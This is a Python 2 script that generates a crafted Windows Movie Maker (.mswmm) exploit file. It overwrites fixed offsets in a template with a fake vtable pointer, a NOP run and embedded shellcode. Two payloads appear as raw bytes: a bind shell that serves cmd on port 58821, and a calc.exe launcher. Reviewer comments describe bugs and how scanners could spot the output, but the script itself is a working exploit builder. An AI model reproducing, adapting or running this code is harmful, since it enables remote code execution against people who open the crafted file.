import sys
import os

# Command-line contract: <target> <port> <shellcode-type>, consumed at import
# time. Only ShellcodeType is read by main(); Target and Port are bound here
# but not referenced anywhere else in this file. A missing argument raises
# IndexError and a non-numeric port raises ValueError before main() runs.
Target, Port, ShellcodeType = sys.argv[1], int(sys.argv[2]), sys.argv[3]

def main():
    """Assemble a crafted .mswmm file from a template and a payload blob.

    Reads the template at exploits/code/data/src.mswmm, keeps four byte
    ranges of it verbatim and writes them to
    exploits/code/output/exploit.mswmm with two fixed 4-byte values, a
    4-byte pointer, a 12-byte 0x90 run and a 1120-byte payload spliced in at
    fixed offsets. The payload is selected by the module-level ShellcodeType;
    the module-level Target and Port are never read here.

    Returns None. IOError and ValueError are reported on stdout and
    swallowed; any other exception is reported and re-raised.

    NOTE(review): Python 2 syntax throughout (print statements, tuple
    unpacking in the except clause); this does not parse under Python 3.
    """

    try:
        rpath = 'exploits/code/data/src.mswmm'
        # Opened read/write although it is only read. There is no finally, so
        # the handle stays open if any later line raises.
        fdR = open(rpath, 'rb+')
        strTotal = fdR.read()
        # Template slices kept verbatim. The 4-byte gaps at 9976 and 10104 are
        # refilled by size_first_new / size_second_new below. The 1124-byte gap
        # 16496..17619 is replaced by p2p (4) + padding (12) + payload (1120)
        # = 1136 bytes, so the output is 12 bytes longer than the template —
        # presumably intended, TODO confirm. No length check on strTotal: a
        # short template silently yields short or empty slices.
        str1 = strTotal[:9976]
        str2 = strTotal[9980:10104]
        str3 = strTotal[10108:16496]
       	str4 = strTotal[17620:]		
        size_first_new = "\x20\x00\x00\x00" # size of first new()
        size_second_new = "\x11\x11\x00\x00" # size of second new()		
        p2p = "\x71\xb5\x06\x77" # vtable fake pointer from resource section COMRes -8 to jmp EBX 
		
        # Shellcode port 58821
        # Payload literal selected by type "R". Per the comment above, the
        # listening port is fixed inside these bytes; the Port argument parsed
        # at module level is not used to build it.
        remoteshell=("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
        "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
        "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
        "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
        "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
        "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
        "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
        "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
        "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
        "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
        "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
        "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
        "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x31" +
        "\xdb\x53\x68\x02\x00\xe5\xc5\x89\xe6\x6a\x10\x56\x57\x68" +
        "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff" +
        "\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7" +
        "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
        "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44" +
        "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56" +
        "\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86" +
        "\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60" +
        "\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5" +
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f" +
        "\x6a\x00\x53\xff\xd5")
		
        # Exec calc.exe
        # Payload literal selected by types "E", "C" and "L" (all three map
        # to the same bytes). Adjacent string literals, no "+" here.
        executecode=("\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
        "\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
        "\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
        "\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
        "\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
        "\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
        "\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
        "\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
        "\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
        "\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
        "\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
        "\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
        "\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
        "\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
        "\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
        "\x51\x6b\x28")

        # Map the type flag to a payload. Any value other than R/E/C/L leaves
        # Shellcode unbound, so the len() below raises UnboundLocalError,
        # which the bare except at the bottom prints and re-raises.
        if ShellcodeType == "R":
       	  Shellcode=remoteshell
        if ShellcodeType == "E":
          Shellcode=executecode
        if ShellcodeType == "C":
          Shellcode=executecode
        if ShellcodeType == "L":
          Shellcode=executecode	
			
        # The layout computed above assumes exactly 1120 payload bytes:
        # longer payloads are rejected, shorter ones are padded with 0x90.
        if len(Shellcode) > 1120:
          print "[*] Error : Shellcode length is long"
          return
        if len(Shellcode) <= 1120:
          dif = 1120- len(Shellcode)
          while dif > 0 :
            Shellcode += '\x90'
            dif = dif - 1
        path = 'exploits/code/output/exploit.mswmm'
        print "HOLA"	# leftover debug output
        # Output is written in the order documented on the slices above. The
        # output directory is not created here; a missing directory surfaces
        # as IOError. Note(review): the fixed offsets, the two 4-byte constants
        # and the 0x90 run immediately before the payload give the output a
        # stable shape that file scanners can key on.
        fdW = open(path,mode='wb')		
        fdW.write(str1)
        fdW.write(size_first_new)
        fdW.write(str2)
        fdW.write(size_second_new)
        fdW.write(str3)
        fdW.write(p2p)
        fdW.write('\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90')     # padding		
        fdW.write(Shellcode)
        fdW.write(str4)		
        fdW.close()
        fdR.close()
    # Python 2-only tuple unpacking of the exception; IOError is swallowed
    # after printing, so a failed write leaves a partial or missing output
    # file with a zero exit status.
    except IOError as (errno, strerror):
        print "I/O error({0}): {1}".format(errno, strerror)
    except ValueError:
        print "Could not convert data to an integer."
    # Bare except also catches KeyboardInterrupt and SystemExit; it reports
    # the type and re-raises, so these are not swallowed.
    except:
        print "Unexpected error:", sys.exc_info()[0]
        raise
# Script entry point; main() is defined above in this file and takes no
# arguments (it reads the module-level ShellcodeType instead).
if __name__ == "__main__":
    main()
